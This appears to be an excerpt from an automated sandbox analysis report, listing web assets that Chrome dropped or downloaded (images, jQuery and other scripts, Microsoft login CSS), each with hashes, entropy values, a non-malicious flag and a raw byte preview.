                                                                                                                                                                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2672
                                                                                                                                                                                                                Entropy (8bit):6.640973516071413
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                                                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:PNG image data, 36 x 36, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):409
                                                                                                                                                                                                                Entropy (8bit):6.965469148432876
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:6v/7b+44444444444444g+YfXezq4LBCq+MNCLHyOEcZ7:O+GkChMNeyg7
                                                                                                                                                                                                                MD5:424EB5C034441D211437D6672F19F27F
                                                                                                                                                                                                                SHA1:0CBB3022E5802887B3170C7FC4C6F6C031FF391E
                                                                                                                                                                                                                SHA-256:95AB9D5303D1AB8CDAB1DFD101D912F161C4460C074C22BB72A7CA45AA02FD7A
                                                                                                                                                                                                                SHA-512:6DD5E52DADB685E983372FB8DAABDA7E05D260BB67F6263E8F3530369D21E94E519B3D9F408B8E29C2E5F77EA80CA78E7376BF65FA8E8CA6F6C2AA7814A41649
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:.PNG........IHDR...$...$.......h....3PLTE...EZdEZdEZdEZdEZdEZdEZdEZdEZdEZdEZdEZdEZdEZdEZdEZd&.(.....tRNS.. 0@P`p........#.......IDATx.}S... ..3EE....n*.1j...`w[...q.F....+....+e#.......G...#.L.*tH..m.a;.'..f.^J."<.])..*..I..=>.+.!.$..^.!..5zW.d...]YW/.{.@..y..&>P.?...~.]..2.S..F..k&..dk.@%i$..~...H.2......-zf.T.'b.B.Q..<...f/...P.b.m..$...6.IB.HTx..%.G$*\.R..2"|"LW...>.^.#je.X..w...9#,...G....IEND.B`.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):89500
                                                                                                                                                                                                                Entropy (8bit):5.28977521478275
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1vN:DIh8GgP3hujzwbhd3XvSiDQ47GK/
                                                                                                                                                                                                                MD5:7C14A783DFEB3D238CCD3EDD840D82EE
                                                                                                                                                                                                                SHA1:AD886E472B3557F3DC7DFA2BC43468AB8D1CEF5B
                                                                                                                                                                                                                SHA-256:80F04717F32EA0320C5E8618FBACEDD1FEE3A8775AD8292140A6113551D4B5B0
                                                                                                                                                                                                                SHA-512:FA3E021CA60A9ADBE570C6565C7370727904C4396C23A4C519DAF258D05FAE3E17BFB7607A0AB6DFE2B7150A4EC1B6A95E6D49675291BE5F6A4E5679AD78D858
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15086
                                                                                                                                                                                                                Entropy (8bit):3.896036126265902
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:jAToLSCktSn0EKHSEPc26HoKCMRei14XG2lXRSaHL35s:jATo4M0pHTPc26HoKCGWlBpHLJs
                                                                                                                                                                                                                MD5:1AB63272847D35C254CDB9F69EDC3FCB
                                                                                                                                                                                                                SHA1:1B2DA0323B52F0D192747D4C44261E9FD562E2EA
                                                                                                                                                                                                                SHA-256:0300AD6BAE0AA70A8D864C177FFC7EE044B885ECE245D3C48F7AD966E20B2095
                                                                                                                                                                                                                SHA-512:A07FF0EBA5151536FABD414C5FDDB6BA6102FC15A390319174AB24FA879092BE3B14C3DDDABFF4E3AD648AF72EAD9E2F9291D2EB40560BF54C85DEA91F32A86D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$...........................P=..P=V.P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=V.P=..............P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=......P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=W.P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=W.P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P=..P
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:1
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with very long lines (48120)
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):48121
                                                                                                                                                                                                                Entropy (8bit):5.399559475473033
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:1CbU/4ruPh5qaq75KvO8fV9/KFHk7z6ybMJhTBsgVX2GwDBsjY1L8ep7K1oiSJvU:QruPh5qaq7gGwV9ygWyb42GQsp
                                                                                                                                                                                                                MD5:240198B7133FAF43160703113AA2F601
                                                                                                                                                                                                                SHA1:AB61FEDDAE321268BD84839B8908E611E9300AFD
                                                                                                                                                                                                                SHA-256:401258036014BCC401F7894FD5ACC7D6BA31CDF3162C1D55EBB219D908BCF496
                                                                                                                                                                                                                SHA-512:F49972AE131DE7EE33D86472471237580A1055C2E086BE0266E7171CB9C423A99145B006CF5D25E25288E64440430E43782E976BF7EC117BDAA52E5D370AB139
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:"use strict";(function(){function Bt(e,t,a,o,c,l,g){try{var h=e[l](g),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function jt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function g(s){Bt(l,o,c,g,h,"next",s)}function h(s){Bt(l,o,c,g,h,"throw",s)}g(void 0)})}}function D(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):D(e,t)}function Ue(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function De(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Ue(e,c,a[c])})}return e}function Sr(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):28
                                                                                                                                                                                                                Entropy (8bit):3.950212064914748
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:WZoS8/ZYn:WZoS8/ZYn
                                                                                                                                                                                                                MD5:C3F64CB2A8B00CBBC30CE2908208A29D
                                                                                                                                                                                                                SHA1:E4AA7CAB67F4CF5FA52371DDC25A75AAFD4D0CCC
                                                                                                                                                                                                                SHA-256:391601283994BCD9486160BF8A5637410D280E1BDDD3AEF5428454976E193E81
                                                                                                                                                                                                                SHA-512:6CCBC26128FE65D6D313B965DA3D2E201D506442D0036404ABB490BE0FC99B3A0FDB611269B932DBA7F3A621E11F79ED213D2B11D487EE39C54A17D97A823552
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlEPc3khG_4iBIFDZFhlU4SBQ2RYZVO?alt=proto
                                                                                                                                                                                                                Preview:ChIKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):1608
                                                                                                                                                                                                                Entropy (8bit):5.2658318815692535
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:cKAXQSfUcJGHPd5G+NwRHWdouz8HenITnO553WAv:CXQSfUAGHPd5XcWdiHSkO55Rv
                                                                                                                                                                                                                MD5:4D37ABB9B4EB9A748B19943F2CA07C4E
                                                                                                                                                                                                                SHA1:DF596C72A9DC38FE9BF3788EDC31FE63CE532751
                                                                                                                                                                                                                SHA-256:624BA448758F813C0B4A1271BCB3043DDF0E59911916C331744854E997B3827B
                                                                                                                                                                                                                SHA-512:192A760CF55BF90351314DC7CB016245F4E866C30F748C10C88B17E8E21136EF6C1F745AA2C81C61CDEF8EFF563EA2B80940E6824FE09563DDDF1B56C76A8B0B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/images/logo.svg
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="100px" height="100px" viewBox="0 0 100 100" enable-background="new 0 0 100 100" xml:space="preserve">..<g>...<g>....<path fill="#FFFFFF" d="M10.874,85.257c-2.632,0-5.129-1.551-6.193-4.119c-1.409-3.396,0.223-7.283,3.642-8.681l78.254-32.006.....c3.419-1.397,7.334,0.221,8.743,3.617c1.408,3.398-0.225,7.284-3.643,8.682L13.421,84.754.....C12.588,85.095,11.723,85.257,10.874,85.257z"/>...</g>...<g>....<path fill="#FFFFFF" d="M10.874,59.904c-2.632,0-5.129-1.55-6.193-4.121c-1.409-3.398,0.223-7.284,3.642-8.682l78.254-32.005.....c3.419-1.398,7.334,0.223,8.743,3.617c1.408,3.396-0.225,7.283-3.643,8.682L13.421,59.399.....C12.588,59.742
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):49954
                                                                                                                                                                                                                Entropy (8bit):7.99493321471063
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:1536:vr2T/4LxF17O6lJgX3ys65sBcY++i0RumwzV:Cz4LL1imP56m+i+umwzV
                                                                                                                                                                                                                MD5:E16AC075AC754DBD1CF969508220E30D
                                                                                                                                                                                                                SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                                                                                                                                                                                                                SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                                                                                                                                                                                                                SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):20410
                                                                                                                                                                                                                Entropy (8bit):7.980582012022051
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                                                                                                                                                                                MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                                                                                                                                                                                SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                                                                                                                                                                                SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                                                                                                                                                                                SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                                                                                                                                                                                Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):2672
                                                                                                                                                                                                                Entropy (8bit):6.640973516071413
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                                                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                                                                                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5525
                                                                                                                                                                                                                Entropy (8bit):7.961202222662501
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                                                                                                                                MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                                                                                                                                SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                                                                                                                                SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                                                                                                                                SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):1350
                                                                                                                                                                                                                Entropy (8bit):5.051532597662484
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:2dG5AXxGvO7LfsoYAaASm/uSJyA1SKjJ2PaNOpCxGKV2x:cKAXQSfslAarouSA0SK12P8KCxGKV2x
                                                                                                                                                                                                                MD5:E00825A9E3D25E21F1DA9D01BDCDFB7B
                                                                                                                                                                                                                SHA1:2B4D87961D9E08FC5B48742FE2421A6F9510FA76
                                                                                                                                                                                                                SHA-256:2DD2C80457A627F9D494765FF045C15223510B2D2CEBD610E02BD1F732D34BCB
                                                                                                                                                                                                                SHA-512:331970F247A37FEE32FC3BBD25D8790C93B900EEDBA725EF3C8DC9AD665E380C2B311A66B64F771DEA7F5EB837AE57BB2DF36C88251D956977EFA6174E5EE1EA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                URL:https://app.getbeamer.com/images/social/share.svg
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 16.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="30px" height="30px" viewBox="485 192.5 30 30" enable-background="new 485 192.5 30 30" xml:space="preserve">..<path d="M508.75,213.75c0,2.071-1.679,3.75-3.75,3.75s-3.75-1.679-3.75-3.75c0-0.507,0.101-0.989,0.282-1.43l-3.728-2.331...c-0.687,0.773-1.688,1.261-2.804,1.261c-2.071,0-3.75-1.679-3.75-3.75s1.679-3.75,3.75-3.75c1.116,0,2.117,0.487,2.804,1.26...l3.728-2.33c-0.182-0.441-0.282-0.924-0.282-1.43c0-2.071,1.679-3.75,3.75-3.75s3.75,1.679,3.75,3.75S507.071,205,505,205...c-1.115,0-2.117-0.487-2.804-1.26l-3.729,2.33c0.377,0.914,0.376,1.948,0,2.86l3.729,2.331c0.687-0.773,1.688-1.261,2.804-1.261...C507.071,210,508.75,211.679,50
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                Size (bytes):35170
                                                                                                                                                                                                                Entropy (8bit):7.993096534744333
                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                                                                                                                                MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                                                                                                                                SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                                                                                                                                SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                                                                                                                                SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
